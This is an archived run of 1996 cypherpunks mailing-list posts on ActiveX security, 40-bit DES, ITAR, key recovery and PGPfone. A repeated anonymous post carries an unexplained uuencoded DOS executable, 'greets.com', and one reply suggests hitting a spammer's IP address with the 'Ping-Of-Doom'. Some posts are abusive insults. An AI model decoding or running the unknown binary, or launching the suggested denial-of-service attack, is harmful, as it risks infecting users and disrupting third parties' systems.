>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:37:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170135.RAA24595@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:37:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: This list sucks
Message-ID: <199612170136.RAA24602@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:38:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170136.RAA24604@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:38:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170136.RAA24606@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:38:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170136.RAA24608@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@media.mit.edu>
Date: Mon, 16 Dec 1996 14:42:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Securing ActiveX.
In-Reply-To: <Pine.SUN.3.91.961216123313.15110L-100000@beast.brainlink.com>
Message-ID: <cpa7mmi2jsc.fsf@hattrick.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Dec 1996 ichudov@algebra.com wrote:
>I do not understand how one can secure ActiveX.

Me neither! But the approach of requiring code signatures so you can
at least break the fingers of whomever damaged your machine does have
some merit.

sunder@brainlink.com (Ray Arachelian) writes:
> Simple.  Check out Windows NT, under NT you can write/run programs as 
> services which log in as an account.  When you do this, that service 
> program is limited to the security restrictions of that account.

This is kind of like running servers in Unix as another user in a
chrooted partition? That doesn't work, either.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jlucas4@capital.edu (Jesse Lucas)
Date: Mon, 16 Dec 1996 14:55:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Making bridges...
Message-ID: <9612162247.AA10919@athena.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain




Mailing list:

   Don't want to be a bother but...  My sysadmin here at school's got the 
"make" command locked out of UNIX here and I can't compile the PGP code 
without it.  If anyone has a bridge for this then please let me know.

				Jeigh





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walt Armour <walt@blarg.net>
Date: Mon, 16 Dec 1996 18:10:11 -0800 (PST)
To: "trei@process.com>
Subject: RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <01BBEB7C.60FEBD40@dialup45.blarg.net>
MIME-Version: 1.0
Content-Type: text/plain


Security through obscurity is no security at all.

As for PnC (actually, the scCryptoEngine beneath it), we get the 40 bits 
from the 56 bits by nulling out the high nybble of every other byte.

walt

----------
From: 	Peter Trei[SMTP:trei@process.com]
Sent: 	Monday, December 16, 1996 2:02 AM
To: 	walt@blarg.net; cypherpunks@toad.com
Subject: 	RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!

> From:          Walt Armour <walt@blarg.net>
> To:            "'Matthew Ghio'" <ghio@myriad.alias.net>
> Cc:            "cypherpunks@toad.com" <cypherpunks@toad.com>
> Subject:       RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
> Date:          Fri, 13 Dec 1996 22:30:23 -0800

> There is no arguing that 40 bits is strong security.  I agree with that.
[...]

Would you mind telling us just how you expand the 40 key to the 56
bits needed for DES? (Security through obscurity has a bad rep on
this list). For many  methods of doing so, 40bit DES is NOT
secure against a motivated individual's attack.

Peter Trei
trei@process.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 16 Dec 1996 18:23:32 -0800 (PST)
To: "Dale Thorn" <trei@process.com>
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
Message-ID: <19961217022038093.AAA188@gigante>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Dec 1996 21:28:46 -0800, Dale Thorn wrote:

>> Averaging several runs:
>> "C":   102,300 crypts/sec
>> ASM:   238,000 crypts/sec

>Someone on this list should know if it is possible to maximize speed in
>a typical 'C' routine, using Register variables (particularly for loops),
>inlining everything possible, etc., to get executable code much closer
>than a factor of 2x difference.  Can it be done on a PC, and how hard
>would it be to explain, to cover a representative variety of techniques?

A good optimizing compiler comes _close_ to hand coded, especially with the
many new concerns on Pentium+ processors (pipeline optimization, fpu tricks,
etc).

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 17 Dec 1996 22:26:26 -0800 (PST)
To: "Michael H. Warfield" <zerofaith@mail.geocities.com>
Subject: Re: sorry for the spam!
Message-ID: <19961218062304640.AAA192@gigante>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Dec 1996 22:49:50 -0500 (EST), Michael H. Warfield wrote:

>	The individual is a little shit operating a windows system on
>IP address 206.129.116.108 as of Sunday evening.  While the messages

Did you try the Ping-Of-Doom?

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 16 Dec 1996 19:41:54 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: ITARs effects
Message-ID: <199612170339.TAA20929@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 PM 12/14/96 -0500, Robert Hettinga wrote:
>At 7:09 pm -0500 12/14/96, Adam Shostack wrote:
>>	My understanding is that they choose not to continue
>>per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
>>a change.  Or did Phil not put the code up for FTP?
>
>Actually, it's my understanding that PRZ didn't do it personally. Someone
>else got the code from Phil and put it on the net. Phil had nothing to do
>with it. Except for writing PGP, of course. :-).

I suppose one of the myriad reasons it would have been difficult/impossible 
to prosecute Zimmermann is that, because the "crime" was approaching the end 
of the statute of limitations, the prospect existed that sometime during the 
trial, we could have had a "Perry Mason"-type ending, with somebody else 
standing up and claiming credit for the (then past the limit) act of 
uploading PGP.  If the standard used for conviction was "beyond a reasonable 
doubt," it would be just about impossible to convict unless the gov't had 
some sort of person-specific evidence, rather than merely evidence that PGP 
got onto the web.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 16 Dec 1996 19:40:13 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: KRA_gak
Message-ID: <199612170340.TAA20937@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:50 AM 12/13/96 -0500, John Young wrote:
> 12-12-96
> "High-Tech Leaders to Facilitate Recovery of Encrypted
> Information Globally. Key Recovery Alliance Welcomes 29 
> New Members"
> The key recovery alliance has more than tripled its membership 
> and identified its charter objectives.
> + expediting the widespread, global use of strong encryption 
> + evaluating technologies that are flexible and scaleable to meet
> various changing commercial needs and policies 
> + promoting interoperability between different key recovery and 
> non-key recovery solutions 
> + defining a commercial infrastructure for worldwide development 
> of strong encryption 
> + maximizing security for business

While this will, of course, be obvious to those frequenting CP, notice a 
curious fact here:  The commentary above refers to the organization as a 
"Key Recovery Alliance."  Well, one might normally expect that organizations 
are usually named based on their primary raison d'etre.  Yet, the objectives 
listed above clearly do not require, or even desire, "Key Recovery."  Quite 
the opposite, in fact.  If there was any need to demonstrate the 
illegitimacy of this  arrangement to the press or public, you need merely 
show that the people and organizations participating in it don't even 
consider the goal implicit in the name to be a desireable outcome.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Dec 1996 17:41:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anonymous hate mail from John Gilmore, his friends, and lovers
In-Reply-To: <199612170114.RAA17454@cypherpunks.ca>
Message-ID: <HP52yD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


More shit from some "cypher punk" asshole:

>Received: (from daemon@localhost) by abraham.cs.berkeley.edu (8.7.5/local) id RAA17454 for dlv@bwalk.dm.com; Mon, 16 Dec 1996 17:14:06 -0800
>Date: Mon, 16 Dec 1996 17:14:06 -0800
>Message-Id: <199612170114.RAA17454@cypherpunks.ca>
>To: dlv@bwalk.dm.com
>From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
>Comments: There is _no way_ to determine the originator of this message.
>	If you wish to be blocked from receiving all mail from the remailer
>	network, send your request to the <remailer-operators@c2.org>
>	mailing list.  The operator of this particular node can be
>	reached at <remailer-admin@cypherpunks.ca>.
>References: <2Js2yD23w165w@bwalk.dm.com>
>
>Could you please stop wasting the time of cypherpunks with your stupid
>vendettas? Your posts are consistently a stupid waste of time.

"Cypher punks" have no life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Mon, 16 Dec 1996 17:52:48 -0800 (PST)
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
Message-ID: <01BBEB92.ADD153B0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim McCoy wrote:
> The other problem is that the proposed Authenticode system and other "signed
> applet" systems only provide accountability after the fact.  This is little
> help when your hard drive is toast and the only proof you had was a logfile
> which was the first thing erased...  

No, it's not really the accountability that's the issue.  It's the
ability to choose before the fact that I 'trust' the software's author.

> The illusion that only "trusted software
> puslishers" will be given blanket authorization is a pipe dream: users are
> sheep who will hit that "OK" dialog box as many times as necessary to get the
> tasty treat they are anticipating (and there is actual experimental evidence
> to back this up :)  

Yup, point well taken.  <story user=clueless>I popped into an empty users 
cube last week to borrow the phone.  On the monitor was a post-it note from
one of his co-workers that read, 'Please write your password here:' and of
course the helpful fellow had done just that.</story>  With real users I 
suspect only centrally administered security decisions that they can't override 
will be effective.  Hmm... wonder what I can retrofit into IE to accomplish that.

> I expect that the first post-Authenticode ActiveX virus
> will be one to modify the signature checking routines or add additional keys
> to the registry which makes the second round of the attack appear to be a
> valid OS update from Microsoft. 

Shh... we have enough kool dewds floating around here looking for ideas.

> The state of the art was up to it quite a while ago.  Check out KeyKOS and
> other OSes which use capability semantics for access control.  

I agree 100%.  The intent of my comments was that such security *is* 
possible, but it's not available in widely deployed mass-market OS's.
I'd love to hear feedback to the contrary, but it seems to me that it's
extremely difficult to layer that type of security onto an existing system.

-Blake (who's thinking about putting crazy glue into one user's floppy drive)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 16 Dec 1996 21:06:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Big Brother moves to Oregon
Message-ID: <3.0.1.32.19961216204945.0113666c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is something you may not have heard about.

The new drivers licences in the state of Oregon have a digital picture on
them.  You get one on your licence and the state keeps on on file.  Any
time the police need to pull up information on you, your picture comes up
along with it.  (The police are supposed to have this capability in their
vehicles any day now, if not already.)  This plan is being put into place
as fast as they can and over 70+ million over budget.  (They expect to have
all of the Department of Motor Vehicles offices hooked up in a couple of
months.)

And the "Drivers Licence Number" has been replaced with a "Customer
Number".  (Had to have a bit of newspeak creep in there somewhere I guess...)

Oregon used to be a nice place to live.  Lately they have been the
experementing ground for some of the most draconian laws in the country.

"Welcome to the New Global Village.  You are Customer Number 6."





---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Mon, 16 Dec 1996 18:08:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: ElGamal
Message-ID: <199612170208.VAA23438@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May is widely recognized on the net, because of his frequent vitriolic 
postings, as someone/thing ready to cut off his own penis to spite the 
testicles, although his friends recognize him better from the rear.

             __o
           _ \<_  Tim May
          (_)/(_)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Mon, 16 Dec 1996 21:24:35 -0800 (PST)
To: ichudov@algebra.com
Subject: RE: Securing ActiveX.
Message-ID: <19961217052343287.AAA173@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Ray Arachelian (sunder@brainlink.com) said something about Securing ActiveX. 
on or about 12/16/96 11:08 AM

>On Sat, 14 Dec 1996 ichudov@algebra.com wrote:
>
>> Ray Arachelian wrote:
>> > 
>> > Until Microsoft secures ActiveX in it's own sandbox and doesn't allow it 
>> > to access things it shouldn't, it's not cool.
>> > 
>> 
>> I do not understand how one can secure ActiveX.
>
>Simple.  Check out Windows NT, under NT you can write/run programs as 
>services which log in as an account.  When you do this, that service 
>program is limited to the security restrictions of that account.

Not exactly. Win32 API's include the ability for a program to impersonate any 
known user. Besides ActiveX (OLE really) has nothing to do with services. 

In order to make ActiveX secure there would need to be a virtual machine with 
access to a limitted API only. Sound familiar?

>
>If you're using the NTFS file system and give that account access only to 
>one directory, it can't access anything but that directory.  (If you're 
>using FAT, this isn't true and the program can read/write/delete anything 
>it wants.)  Works quite well.
>
>It can be done under 95 but Microsoft will have to write a Sandbox 
>Virtual Machine (a Virtual x86 session whose API's are filtered to 
>prevent access to certain things like the file system, and disables 
>direct I/O.)  Not that easy under '95, but it already exists for NT.


There is no such thing on WinNT.


>
>The problem is how to deal with DLL's.  You don't know all 
>features/functions of all DLL's.  It may be possible to write a DLL that 
>runs outside the sandbox and can act as a proxy to the file system, so 
>it's iffy unless you limit the DLL's and services that ActiveX apps talk 
>to, and make them all live inside the sandbox.
>

Why is that a problem? ActiveX components are shipped as discrete objects with 
a known DLL like interface. DLL's are unloaded when the load counter is zero so 
they don't hang around in memory after the ActiveX job is done. You also cannot 
write a "proxy to the file system" in a DLL. That's a special device driver 
called a filter. Of course there is this Mark Russinovich fellow that is 
showing how this is not exactly true. It is possible to identify all entry 
points in a DLL.

--j
--------------------------------------------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending 
| me email with subject "send pgp key".
| www.Program.com is a good programmer web site.
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 16 Dec 1996 23:11:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SAV_eit
In-Reply-To: <1.5.4.32.19961216140703.0067d0c0@pop.pipeline.com>
Message-ID: <v03007800aedbe053e1ea@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:07 AM -0800 12/16/96, John Young wrote:
> 12-16-96. NYP:
> In fact, the main beneficiaries of the new copyright rules
> are the highest-stake copyright holders: rich, politically
> powerful entertainment and media conglomerates, which fear
> that pirated material will destroy the lucrative
> international market for products that can be digitally
> copied and distributed globally.

Also note who were among Bill Clinton's major supporters.

"He's an honest politician -- he stays bought."  --  Robert A. Heinlein


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 16 Dec 1996 22:52:31 -0800 (PST)
To: pgp-fone@rivertown.net
Subject: Re: PGPfone contact server
Message-ID: <1.5.4.32.19961217065155.003b5694@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[From a discussion on pgp-fone@rivertown.net]
>>> Is there any kind of server method people on this list use to meet up on
>>>PGP fone???
>>IMHO... Because PGPfone's main goal is to provide security and maybe
>>some anonymity, would it make [no?] sense to have a feature like this.

I can think of a few useful variants on this kind of service

1) Incoming-Call-Notifier daemon - faster than email, smaller than pgpfone.
(PGPfone may not have a problem with this, but Netscape CoolTalk has a
watchdog daemon that hangs out waiting for calls.  Don't know if it barks,
but it's got to be smaller than NS+CT.  Firewalls generally kill these,
though...

2) Chat-line with switch to voice - an IRC channel would do fine, and be
easy to set one up, for people who want to meet to play with the technology;
for people who want to cut out to PGPfone from other IRC groups, you don't
even need that, though distributing an IRC client with a "PGPfone" button
might be a good marketing technique.  Name the IRC channel "pgpfone"...

CU-SeeMe uses this approach - reflectors are often busy or way slow,
and the available public-access reflectors change pretty often,
and it's much easier to find people or find interesting reflectors
using the IRC channel than polling for busy-signals.  CU-SeeMe supports
conversations through reflectors as well as direct-connection,
and doing a PGPfone-like DC mode might be fun as well.

3) Finding specific people who don't have predictable IP addresses -
IRC can also do this, or email, but it wouldn't be hard to build a
web form widget that lets you plug in your name/handle and 
scarfs up your current IP address or lets you enter it.
A "specific person" could be an alias, of course.

4) A secure n-person conference bridge could be good also,
though it's much more difficult to make something like that work,
especially if you use a crypto mode that dislikes dropped packets.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 16 Dec 1996 23:12:07 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: Hard to Tax Scenario
In-Reply-To: <199612170047.QAA04752@crypt.hfinney.com>
Message-ID: <v03007803aedbf41d886a@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:47 PM -0800 12/16/96, Hal Finney wrote:

>One difficulty I find with this scenario is its science fictional nature.
>It is hard for me to consider details about the life of a doctor who works
>via VR.

But telepresence would be wonderful for dealing with infectious diseases.

>Also, if we are already in a situation where 30% of people are
>avoiding taxes there will certainly have been major changes in society,
>but I don't know what they will be.

I am not sure we aren't close to that 30% if you include the people who
receive small portions of their income in cash and fail to report it.
While these reporting failures don't have much effect on tax liability,
they do quickly raise the percent of people who are technically in
violation of the tax laws.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 16 Dec 1996 23:12:19 -0800 (PST)
To: Blake Coverett <cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEB92.ADD153B0@bcdev.com>
Message-ID: <v03007804aedbf67c1731@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:49 PM -0800 12/16/96, Blake Coverett wrote:
